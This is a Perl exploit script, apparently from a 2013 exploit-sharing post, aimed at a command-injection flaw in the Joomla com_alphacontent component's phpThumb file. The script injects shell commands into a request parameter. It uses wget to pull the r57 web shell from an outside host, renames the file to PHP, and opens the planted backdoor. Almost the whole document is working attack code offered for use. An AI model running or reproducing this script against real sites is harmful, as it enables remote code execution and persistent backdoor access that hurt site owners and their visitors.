#Title : Joomla com_alphacontent Remote Code Execution #Author : DevilScreaM #Date : 1 Desember 2013 #Category : Web Applications #Type : PHP #Vendor : http://alphaplug.com/ #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows & Linux #Vulnerabillity : Remote Code Execution #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request; $target = $ARGV[0]; if($target eq '') { print "======================================================\n"; print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n"; print "======================================================\n"; sleep(0.8); print "Usage: perl exploit.pl \n"; exit(1); } if ($target !~ /http:\/\//) { $target = "http://$target"; } #print "[*] Enter the address of your hosted TXT shell (ex: ' http://c99.gen.tr/r57.txt') => "; #$shell = ; sleep(1); print "======================================================\n"; print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n"; print "======================================================\n"; sleep(1.1); print "[*] Testing exploit ... \n"; sleep(1.1); $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1'); $shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt"; $website = "$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr []=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; $request = $agent->request(HTTP::Request->new(GET=>$website)); if ($request->is_success) { print "[+] Exploit sent with success. \n"; sleep(1.4); } else { print "[-] Exploit sent but probably the website is not vulnerable. \n"; sleep(1.3); } print "[*] Checking if the txt shell has been uploaded...\n"; sleep(1.2); $cwebsite = "$target/components/com_alphacontent/assets/phpThumb/shell.txt"; $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { print "[+] Txt Shell uploaded :) \n"; sleep(1); print "[*] Moving it to PHP format... Please wait... \n"; sleep(1.1); $mvwebsite = "$target/components/com_alphacontent/assets/phpThumb/phpThumb.php? src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv shell.txt shell.php ; &phpThumbDebug=9"; $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); $cwebsite = "$target/components/com_alphacontent/assets/phpThumb/shell.php"; $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($c2req->is_success) { print "[+] PHP Shell uploaded => $cwebsite :) \n"; sleep(0.8); print "[*] Do you want to open it? (y/n) => "; $open = ; if ($open == "y") { $firefox = "firefox $cwebsite"; system($firefox); } } else { print "[-] Error while moving shell from txt to PHP :( \n"; exit(1); } } else { print "[-] Txt shell not uploaded. :( \n"; } ============================================================== Shell Access http://TARGET/components/com_alphacontent/assets/phpthumb/shell.php